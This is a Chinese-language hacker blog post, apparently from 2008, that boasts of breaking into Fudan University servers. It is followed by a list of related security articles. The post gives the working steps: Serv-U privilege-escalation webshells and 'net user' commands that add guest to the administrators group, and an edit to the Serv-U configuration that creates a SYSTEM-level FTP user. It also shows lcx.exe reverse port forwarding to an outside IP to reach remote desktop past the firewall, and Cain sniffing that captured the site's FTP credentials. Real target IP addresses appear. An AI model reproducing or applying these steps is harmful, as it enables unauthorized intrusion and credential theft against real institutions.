看我來入侵復(fù)旦大學(xué)(圖)
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:37:24 作者:佚名
我要評(píng)論
一、師出有名
某日十分無聊,就和X論壇的超級(jí)版主wyzhack瞎吹牛,東年西扯的。后來不知道怎么的扯到復(fù)旦去了,他提議說不如我們黑掉復(fù)旦吧。正好當(dāng)時(shí)也比較清閑,就答應(yīng)一起看看了,嘿嘿。這次跑去黑復(fù)旦純粹是為了練習(xí)技術(shù)。
二、戰(zhàn)略部署
這次要拿的
在圖12里面,我們可以看到有ASPNET這個(gè)用戶,一般來說很有可能支持ASPX,因?yàn)锳SPX馬的權(quán)限一般要比ASP的高。所以我上傳了一個(gè)ASPX馬。然后再傳了一個(gè)SU提權(quán)的ASP馬,執(zhí)行:"net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三條命令,意思是先激活guest用戶,再給guest用戶設(shè)定一個(gè)密碼,再把guest用戶添加進(jìn)管理員組。幸運(yùn)的是Serv-U的默認(rèn)連接密碼沒有改,命令都成功執(zhí)行了。在ASPX馬里執(zhí)行:"net user guest"我們可以發(fā)現(xiàn)guest已經(jīng)隸屬于管理員組了,
。用ASPX馬讀取了注冊(cè)表的遠(yuǎn)程桌面服務(wù)端口,發(fā)現(xiàn)就是默認(rèn)的3389,不過Terminal Services服務(wù)當(dāng)時(shí)是沒有開的。后來wyzhack放了鴿子才給開了,嘿嘿。
四、守株待兔
直接連接3389是行不通的,防火墻把我們擋在了外面。不過我們可以用lcx.exe給它來個(gè)端口轉(zhuǎn)發(fā)。直接用ASPX馬或者SU提權(quán)馬發(fā)現(xiàn)都不能執(zhí)行l(wèi)cx.exe進(jìn)行轉(zhuǎn)發(fā),所以我想通過修改Serv-U的配置文件來添加一個(gè)具體system權(quán)限的FTP用戶,再登錄上去進(jìn)行端口轉(zhuǎn)發(fā)。就是修改C:\Program Files\Serv-U\ServUDaemon.ini這個(gè)文件的內(nèi)容啦。如何修改我就不廢話了,有興趣的話大家可以去了解下SU配置文件的存放規(guī)則,了解之后修改起來就得心應(yīng)手的了。我就添加了一個(gè)用戶名為hackest的,擁有system權(quán)限的FTP用戶。要是配置文件沒有權(quán)限修改的話,可以用SU提權(quán)馬執(zhí)行cacls.exe修改文件屬性為everyone完全控制就可以修改的了,不過cacls.exe需要文件格式為NTFS的才可以使用哦。在CMD下登錄FTP上去,執(zhí)行:
C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本機(jī)執(zhí)行:
lcx.exe -listen 51 2007
然后連接本機(jī)的的2007端口就可以登錄遠(yuǎn)程服務(wù)器了,
。到這里我們就已經(jīng)成功控制了61.129.42.42這臺(tái)服務(wù)器。接下來就是安裝cain進(jìn)行嗅探了,具體請(qǐng)參照我的另一篇關(guān)于嗅探入侵的文章。在61.129.42.42上執(zhí)行"ipconfig /all"命令得知默認(rèn)網(wǎng)關(guān)為61.129.42.1,
。復(fù)旦主站的IP為:61.129.42.5。設(shè)置好cain就可以開始嗅探攻擊了,嘿嘿。由于一開始的那幾天是五一假期時(shí)間,嗅了兩天一無所獲。N天之后終于有進(jìn)展了,wyzhack告訴我已經(jīng)成功嗅探到復(fù)旦主站的FTP用戶名和密碼了,
相關(guān)文章

什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時(shí),如果這個(gè)論壇比較大,訪問的人比較多,打開頁面的速度會(huì)比較慢,對(duì)不?!一般來說,訪問的人越多,論壇的頁2024-01-06
Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15
這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶信息泄露。2016-07-27- 國(guó)家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06


